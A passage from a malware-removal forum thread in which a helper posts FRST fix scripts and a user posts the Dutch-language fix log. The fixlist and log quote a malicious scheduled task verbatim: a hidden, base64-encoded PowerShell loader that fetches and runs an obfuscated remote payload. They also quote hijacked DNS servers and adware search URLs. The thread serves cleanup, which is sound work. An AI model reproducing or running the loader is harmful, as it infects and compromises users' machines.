AbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

#3
Tommie

Posted 31 January 2016 - 10:16 AM

Member

Topic Starter
Member
39 posts

It seems the malware is gone. I can click on hyperlinks again via Chrome. The DLL message did just pop-up again.

Hereby the results:

Fix resultaat van Farbar Recovery Scan Tool (x64) Versie:27-01-2016

Gestart door Thomas (2016-01-31 16:39:39) Run:1

Gestart vanaf C:\Users\Thomas\Desktop

Geladen Profielen: Thomas (Beschikbare Profielen: Thomas & Farah)

Boot Modus: Normal

==============================================

fixlist inhoud:

*****************

CreateRestorePoint:

Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130

Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [NameServer] 82.163.142.3 95.211.158.130

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.searchcompletion.com/?si=16615&home=true

SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://search.searchcompletion.com/?si=16615&chrome=true&q={searchTerms}

BHO: Geen Naam -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Geen bestand

Toolbar: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> Geen Naam - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Geen bestand

2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 _____ () C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995}

Task: {397422DB-C117-4E84-99CD-C19801182DA8} - System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAbwBvAHQAZgB1AG4ALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFQAaABWAEcAUgBJAHUASgB2AGMAZQA0AG4ATwBXAEsAOQBhAHkAYgBCAGsAbgBGAEgAUgAxAHMAYwA5AG4ALQBUAFQANgBmAFkAbgBnAGIAWgBxAF8AdwBNAEEAMAB5AEwAYgB1AEUAMQBRAEoAWQBhADMATAB3AFEAMgBkAEkAQgBmAFcASgA3AEoAcwBlADQAOQBhAHgANwBqADMAMgBTAHgAdQBNAHEAXwBaAFIAcQBJAFgARABLAEoAXwB3AG4ANABEAGUAVgB0ADUAbwBVAEQAMABHAFAAMwBkAEsALQBxAEoAcgByAC0AMABOADIASABaAEYATgBhAG4AbgBGAEsAbQBQAGkANQBIAEkAYgBJAHQARQBBAG8ARABfAE8AYwBiAEcANQA3AFQAdgBCAE0AdgAtAC0AcABFAGoAVQBBAGEASgB1ADYASgBJAEQAZQBkAF8ALQBfAGgAMgBUAGoAZwAyAG8AOQBsAFAAZABOAGkAMQAwADQAeAAxAHMAcABUADgAYQBoAHIAcQAyAEUAbgBiAE4AVgBxAEwAVgBWADEAcwA2ADEAcgBaAHcARQBLAEwATQBwAG0AbgBVAE0AUgB6AHgANQBKAGoAZABEAEwAUwA4AGwAWgB1AFoAWgBIAFAAegBJAEgARABMAGsAcwAtAFYAeQBSAGsAeQBrADEANAB4AEUAQQBkAFkAMwBRAEoAbQAzADgALQBRAC0ASwBjAFMAYQBEAFYASQBWAGsANwBCAEYAagBsAE8AYgBLAGYAZQA5ADMAQQA5AEEAdABRADMARAB0AGkAQgBCAGYASgBJAHcANABLAEoAVABPAE4AMQBPADkANgBMAGYANwB6AHYAVQByADAAbgBNAGsAcAByAEcATQBpAGoAUABlAGkATwBwAFIANwBqAFAANAB1AEcARwBOAE0AcwA4AGkAbwA3AEoARwBQAEYAaABpAEgARwBIAHkARQA0AEwAYgBsAFUAYgBQAF8AdwBUAHMASgB2AHYAUABYAEEAWQBOAFQAUwBxADQAYwBnAFMAdgB4ADYAZgBiADEASwBZAGsATQBDAGYAYgBUAEIATAA1AGsAagBtAE4ALQBUAEEAWQBKAEYAdwBUADkARABIAEkARQB6AGgAcABtAGUAUQBWAEEATQBsAE0AWQBOAHkAZQBNAFYAcQB1AHUAYwB1AHUAMwAtAFcAdABuAGIASABNAHIAZgBQAG0ATABUAFUAJgBjAD0AWgA0AEMAeQBWAFkAVQBUAE8ASgAtAEYAQQA5AHoAUgBkAGQARQBWAFYANwBjAEUAagBsADMAbgB3AGUATgBOAGcAVwBFAHEAVABGAEgAcgBtAGkAYwBjAGsAZwBUADkAWgAwAE4AdgBJAFAAcgBjAEMAcAB2AHIAUQBTAHMAaABDAHUAMQBHADIARwAzAE4AQgBlAHoAcABiAEQAZABhAEMAeQBvAHEAVAAyADkARABTAGoAMgByADUAYgA5AG4AZwAyAEEAVAB4AGcANABJAEUAbQBpAGsAaAA4AGMAZwBHAGgAMgA0AFEAUABrADUARwBHAHEAWABpADYAbwBDAC0ARwBSAEEAbgBfAHcAQQAyAC0AVwAxAEcAawBmAG8AbgBxAEEAZABpAHkAcQA2AHQAXwAwAG0AbABhAFcAMgB1AFoAVAB4ADAATwBPADAAQwBCAEQASgBZADIARwBBAGsAWgBRAEUAUAB5AE4AcwBtAFIAUwBIAHEAQwBNADcAcgBmAFYAOQBBAE8AUQBrAEoARwA1AGoATQBnAGoAQwA1AFcAdgAxAFoAawBSADUAbwBFAFkAVQBEAFUASgA3AEkAVwBmAGwAWQBrAG8AaQBRAHQARwBKADIAMQBjAFkAcQBSAGIAYgBOAEkAVgB0AFMAUAA0AGcASgBFAG4AUQBmADEAbQBpAGcANABJAFAARwA2AFUANQBDADMAWgBYAEgAaQBiAHYAWQB2AHMAeQBfAGsASQB1AEsAeQBGAHAAcgBuAG8AZQBMAE8ASwAyAE4AegA2AHkARwByADMASgB2AGEAMwBLAFQAcQBaAE4ANQA2ADUAeQBWAFgAYgBxADgAdQBIADkARgAtAE0AeQBwAEIAUwAyAGwARgBQAEgAaAAwAFEAbwBiAFAASgAzAEoAVABIAG8AdgBmAHMASAA0AGUAUgA0AHQAOABaAEUAZQBlADgAUAA5AGcAegBYAGoASwBwAFIAawBLAFcAcABBAHcASgBuAFYAXwB5AEMAZwBwADUAZgBpAFUAQwAtAGgAawBOADAAbABtAEgANABpAEgAdQAtADkAQQBDAFEAdwBPAFMAVwBoAEcAeQA3AGgANQBjAGUANAA3AGwAdQAxAEEAaQB2ADUAQwBYADAAbQBZAGMAMgBDADgAcQBmAFgARgBHAFMAeABmADMAdAB1AEMAVQBRAFUAMAB3ADMAcwBHAEcAawBBAEsAOQBmAGcAaABXAGUAagAxADAATQB2ADYATABqAEUAUgBtADAANwBVADkAXwBPAHQAaQBsAFgAYgBnAEgAcwBpAEoAMQB4AHIAdABhAGoATQA1AGIAOQB2ADIAWgBrAFUAcQBDAHgAVABHADkANwBkAFYANgBjAG0AZABVAE8AVgBKAHAAZwBPAHAASABMAF8ATgB0AHEAUgBOAHYAawBVAFQAZABEAFUAcQByAEEAbgBQAG0AeQBFAEoAcQBHAGIAOAA3AGQAZQBxADEARgBoAGYAawBoAHIAUgBaAEkATQA0AFUASwBqAEwAdABrAEcARQAxAGIASAAyAFEAXwA0AEkAbABRAHEANgBqAFMAdgBtADAAVwByADIAXwBrAGUAYQB0AFYAWgB1AHkAZwBaAGQAOABjAFcAQwBNAEsARwBjAGoAZwBfAGgAMQB5ADcANQByADQAQwBBAEMALQB3ADQAbwBhAE8AdQBjAFEAMwBKAGsAcQBrAFMAdAAyAGcAOQBGADcASgBEAEEASQBXAGoAZQB2AHcAbgBzAEsAMwBXAHAATwBwAEgAJgByAD0ANAA5ADMAMgA0ADYAMgAzADMANgA3ADIAMAAzADcAOQA1ADgAMAAiADsAJABzAHQAcwBrAD0AIgB7ADgAQgA0AEQANwAxAEQAMwAtAEQAQwAxADgALQBGAEEAMQA0AC0AQwA4ADgARgAtAEIANgAwAEUAMwA1AEEAMQBEADMARgBBAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=

Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F

RemoveProxy:

CMD: netsh advfirewall reset

CMD: netsh advfirewall set allprofiles state ON

CMD: ipconfig /flushdns

CMD: netsh winsock reset catalog

CMD: netsh int ip reset c:\resetlog.txt

CMD: ipconfig /release

CMD: ipconfig /renew

CMD: netsh int ipv4 reset

CMD: netsh int ipv6 reset

EmptyTemp:

CMD: bitsadmin /reset /allusers

*****************

Herstelpunt is succesfol gemaakt.

HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => waarde is succesvol verwijderd.

HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}\\NameServer => waarde is succesvol verwijderd.

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => waarde met succes hersteld

"HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E}" => sleutel is succesvol verwijderd.

HKCR\CLSID\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} => sleutel niet gevonden.

"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => sleutel is succesvol verwijderd.

HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => sleutel niet gevonden.

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => waarde is succesvol verwijderd.

HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => sleutel niet gevonden.

C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995} => is succesvol verplaatst.

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{397422DB-C117-4E84-99CD-C19801182DA8}" => sleutel is succesvol verwijderd.

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{397422DB-C117-4E84-99CD-C19801182DA8}" => sleutel is succesvol verwijderd.

C:\Windows\System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => is succesvol verplaatst.

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA}" => sleutel is succesvol verwijderd.

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

De bewerking is voltooid.

========= Eind van Reg: =========

========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

De bewerking is voltooid.

========= Eind van Reg: =========

========= Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F =========

De bewerking is voltooid.

========= Eind van Reg: =========

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => waarde is succesvol verwijderd.

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => waarde is succesvol verwijderd.

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => waarde is succesvol verwijderd.

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => waarde is succesvol verwijderd.

========= Eind van RemoveProxy: =========

========= netsh advfirewall reset =========

OK.

========= Eind van CMD: =========

========= netsh advfirewall set allprofiles state ON =========

OK.

========= Eind van CMD: =========

========= ipconfig /flushdns =========

Windows IP-configuratie

De DNS-omzettingscache is leeggemaakt.

========= Eind van CMD: =========

========= netsh winsock reset catalog =========

De Winsock-catalogus is opnieuw ingesteld.

De computer dient opnieuw te worden opgestart om het opnieuw instellen te voltooien.

========= Eind van CMD: =========

========= netsh int ip reset c:\resetlog.txt =========

Het opnieuw instellen van Algemeen is geslaagd.

Het opnieuw instellen van Interface is geslaagd.

Het opnieuw instellen van Unicastadres is geslaagd.

Het opnieuw instellen van Route is geslaagd.

De computer dient opnieuw te worden opgestart om deze actie te voltooien.

========= Eind van CMD: =========

========= ipconfig /release =========

Windows IP-configuratie

Er kan geen enkele bewerking op de Draadloze netwerkverbinding 2 worden uitgevoerd als

het medium ervan niet is aangesloten.

Er kan geen enkele bewerking op de LAN-verbinding worden uitgevoerd als

het medium ervan niet is aangesloten.

Draadloos LAN-adapter voor Draadloze netwerkverbinding 2:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

Draadloos LAN-adapter voor Draadloze netwerkverbinding:

Verbindingsspec. DNS-achtervoegsel:

IPv6-adres. . . . . . . . . . . . : 2001:982:61d6:1:3050:ab40:6fb:c152

Link-local IPv6-adres . . . . . . : fe80::3050:ab40:6fb:c152%14

Standaardgateway. . . . . . . . . : fe80::c225:6ff:fe6a:b446%14

Ethernet-adapter voor LAN-verbinding:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel: arnhem.chello.nl

Tunnel-adapter voor isatap.fritz.box:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

Tunnel-adapter voor isatap.{0E4B5A16-F9A0-405C-8E25-CF34DB25E83E}:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

Tunnel-adapter voor isatap.arnhem.chello.nl:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

========= Eind van CMD: =========

========= ipconfig /renew =========

Windows IP-configuratie

Er kan geen enkele bewerking op de Draadloze netwerkverbinding 2 worden uitgevoerd als

het medium ervan niet is aangesloten.

Er kan geen enkele bewerking op de LAN-verbinding worden uitgevoerd als

het medium ervan niet is aangesloten.

Draadloos LAN-adapter voor Draadloze netwerkverbinding 2:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

Draadloos LAN-adapter voor Draadloze netwerkverbinding:

Verbindingsspec. DNS-achtervoegsel: fritz.box

IPv6-adres. . . . . . . . . . . . : 2001:982:61d6:1:3050:ab40:6fb:c152

Link-local IPv6-adres . . . . . . : fe80::3050:ab40:6fb:c152%14

IPv4-adres. . . . . . . . . . . . : 192.168.178.32

Subnetmasker. . . . . . . . . . . : 255.255.255.0

Standaardgateway. . . . . . . . . : fe80::c225:6ff:fe6a:b446%14

192.168.178.1

Ethernet-adapter voor LAN-verbinding:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel: arnhem.chello.nl

Tunnel-adapter voor isatap.fritz.box:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel: fritz.box

Tunnel-adapter voor isatap.{0E4B5A16-F9A0-405C-8E25-CF34DB25E83E}:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

Tunnel-adapter voor isatap.arnhem.chello.nl:

Mediumstatus. . . . . . . . . . . : medium ontkoppeld

Verbindingsspec. DNS-achtervoegsel:

========= Eind van CMD: =========

========= netsh int ipv4 reset =========

Het opnieuw instellen van Interface is geslaagd.

De computer dient opnieuw te worden opgestart om deze actie te voltooien.

========= Eind van CMD: =========

========= netsh int ipv6 reset =========

Het opnieuw instellen van Algemeen is geslaagd.

Het opnieuw instellen van Interface is geslaagd.

De computer dient opnieuw te worden opgestart om deze actie te voltooien.

========= Eind van CMD: =========

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.5.7601 ]

BITS administration utility.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.

Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to cancel {232F76FA-12F2-4CF6-B836-A935A6A9D920}.

{901B15EB-C6A4-4993-AFE0-22BD5F06F919} canceled.

{ACFDEAD3-B466-42E9-B533-EA433BC15F82} canceled.

{BB000BE9-C63A-4A22-86EB-2C11C845F069} canceled.

{CB28AC54-BA4C-47AE-9AB1-66AA1B971DA9} canceled.

{5C50AC6D-B0F6-4FF8-A711-E1067A56B1F1} canceled.

{3AD821A1-F38F-438A-861F-EFC74F50649E} canceled.

6 out of 7 jobs canceled.

========= Eind van CMD: =========

EmptyTemp: => 626.2 MB tijdelijke gegevens verwijderd.

Het systeem moest herstart worden.

==== Eind van Fixlog 16:41:57 ====

#4
Essexboy

Posted 31 January 2016 - 10:52 AM

GeekU Moderator

Retired Staff
69,964 posts

OK lets run SFC on that file and see if that cures the problem

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
cmd: sfc /scanfile=C:\Windows\system32\rundll32.exe
cmd: sfc /scanfile=C:\Windows\SysWOW64\rundll32.exe
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

#5
Tommie

Posted 31 January 2016 - 12:52 PM

Member

Topic Starter
Member
39 posts

